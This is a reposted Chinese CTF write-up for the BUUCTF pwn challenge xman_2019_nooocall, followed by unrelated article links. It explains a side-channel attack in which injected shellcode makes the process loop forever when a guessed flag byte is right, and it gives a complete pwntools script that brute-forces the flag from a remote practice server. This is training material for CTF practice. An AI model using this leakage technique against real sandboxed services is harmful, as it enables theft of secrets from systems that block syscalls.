当前位置: 开发笔记 > 编程语言 > 正文

[BUUCTF]xman_2019_nooocall

作者：哈喽随风amy | 来源：互联网 | 2023-10-17 11:47

xman_2019_nooocall总结可以输入shellcode，但是又不能使用任何系统调用。因此，可以使用侧信道攻击，通过一些现象、反馈等猜测出flag。侧信道常用的反馈有错误

xman_2019_nooocall

总结

可以输入shellcode，但是又不能使用任何系统调用。因此，可以使用侧信道攻击，通过一些现象、反馈等猜测出flag。侧信道常用的反馈有错误、死循环、异常分支等。这里采用死循环，步骤为：

编写shellcode猜测flag的每一位，如果比较正确则死循环

使用tube.can_recv()进行判断，如果陷入死循环，说明当前字符猜测成功

buuctf上的flag都是uuid字符串，因此猜测的字符的范围限于0123456789abcdef-。

EXP

from pwn import * context.arch="amd64" context.os='linux' context.endian="little" context.log_level="error" shellcode = """ add al, 2 sal rax, 32 mov bl, byte ptr [rax+{}] cmp bl, {} jz $-0x3 """ possible_char="0123456789abcdef-}" pi = [ord(x) for x in possible_char] flag = 'flag{' idx = 5 n = 32 ip = 'node4.buuoj.cn' port = 28277 print("ip: {}, port: {}".format(ip, port)) while 1: bb = True for x in pi: # p = process("./xman_2019_nooocall") p = remote(ip, port) p.sendafter("Your Shellcode >>", asm(shellcode.format(idx, x))) bb = p.can_recv(timeout=3) p.close() if not bb: flag += chr(x) print(f"current flag: {flag}") break if flag.endswith("}"): break if bb: print("something wrong...") continue idx += 1

引用与参考

1、My Blog

2、Ctf Wiki

3、pwncli

推荐阅读

int
M1 Mac Mini 频繁自动重启问题探讨

近期遇到 M1 Mac Mini 在休眠状态下频繁自动重启的问题，通过日志分析尝试找出可能的原因。 ... [详细]

蜡笔小新 2024-12-15 11:57:40
email
在阿里云与腾讯云筹建传统主从复制环境_mysql

MySQL主从复制环境可以说是一切高可用的基础。它的原理也比较简单，下面我们先来了 ... [详细]

蜡笔小新 2024-12-07 16:04:39
select
PostgreSQL中的模式管理

本文由瀚高PG实验室撰写，详细介绍了如何在PostgreSQL中创建、管理和删除模式。文章涵盖了创建模式的基本命令、public模式的特性、权限设置以及通过角色对象简化操作的方法。 ... [详细]

蜡笔小新 2024-12-26 11:37:26
select
PHP编程语言及其在股市中的应用

本文将深入探讨PHP编程语言的基本概念，并解释PHP概念股的含义。通过详细解析，帮助读者理解PHP在Web开发和股票市场中的重要性。 ... [详细]

蜡笔小新 2024-12-25 15:02:45
select
解决网站乱码问题的综合指南

本文总结了导致网站乱码的常见原因，并提供了详细的解决方案，包括文件编码、HTML元标签设置、服务器响应头配置、数据库字符集调整以及PHP与MySQL交互时的编码处理。 ... [详细]

蜡笔小新 2024-12-25 14:57:54
config
Linux 透明防火墙（网桥模式）的部署与配置

本文介绍如何在现有网络中部署基于Linux系统的透明防火墙（网桥模式），以实现灵活的时间段控制、流量限制等功能。通过详细的步骤和配置说明，确保内部网络的安全性和稳定性。 ... [详细]

蜡笔小新 2024-12-25 13:17:38
config
在Ubuntu系统中安装Windows 7的详细步骤

本文详细介绍了如何在预装Ubuntu系统的笔记本电脑上安装Windows 7。针对没有光驱的情况，提供了通过USB安装的具体方法，并解决了分区、驱动器无法识别等问题。 ... [详细]

蜡笔小新 2024-12-22 18:26:55
email
mysql 分库分表策略_【数据库】分库分表策略

关系型数据库本身比较容易成为系统瓶颈，单机存储容量、连接数、处理能力都有限。当单表的数据量达到1000W或100G以后，由于查询维度较多， ... [详细]

蜡笔小新 2024-12-03 13:09:47
config
网页分享功能整合

本文介绍了一种通过HTML和JavaScript实现的网页分享功能，支持多个社交平台，包括微信、新浪微博、QQ空间等，方便用户将网页内容快速分享至不同的社交网络。 ... [详细]

蜡笔小新 2024-12-01 12:01:03
config
深入探讨CPU虚拟化与KVM内存管理

本文详细介绍了现代服务器架构中的CPU虚拟化技术，包括SMP、NUMA和MPP三种多处理器结构，并深入探讨了KVM的内存虚拟化机制。通过对比不同架构的特点和应用场景，帮助读者理解如何选择最适合的架构以优化性能。 ... [详细]

蜡笔小新 2024-12-25 19:15:51
config
深入理解线程局部存储

在多线程编程环境中，线程之间共享全局变量可能导致数据竞争和不一致性。为了解决这一问题，Linux提供了线程局部存储（TLS），使每个线程可以拥有独立的变量副本，确保线程间的数据隔离与安全。 ... [详细]

蜡笔小新 2024-12-25 17:04:36
less
FinOps 与 Serverless 的结合：破解云成本难题

本文探讨了如何通过 FinOps 实践优化 Serverless 应用的成本管理，提出了首个 Serverless 函数总成本估计模型，并分享了多种有效的成本优化策略。 ... [详细]

蜡笔小新 2024-12-24 12:44:26
string
java木马_Java校验上传图片文件是否含有木马的两种方式

这两天开发一个app遇到了上传文件的安全问题,在这里记录下来,弥补自己只有鱼的记忆的缺陷,也希望有人能够提供更好的思路去解决文件上传的安全问题.下面这个类是文件上传的公共方法,To ... [详细]

蜡笔小新 2024-12-06 13:33:42
list
CentOS 7.4 KVM虚拟化平台搭建指南

本文详细介绍了如何在CentOS 7.4系统上搭建KVM虚拟化平台，包括环境准备、网络配置、KVM安装与管理等步骤，适用于希望利用KVM进行虚拟化部署的技术人员。 ... [详细]

蜡笔小新 2024-11-30 19:43:44
string
第四十章：基于SpringBoot & Quartz完成定时任务分布式多节点负载持久化

在上一章【第三十九章：基于SpringBoot&Quartz完成定时任务分布式单节点持久化】中我们已经完成了任务的持久化，当我们创建一个任务时任务会被quartz定时任务框架自动持 ... [详细]

蜡笔小新 2024-11-30 14:05:25

哈喽随风amy

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章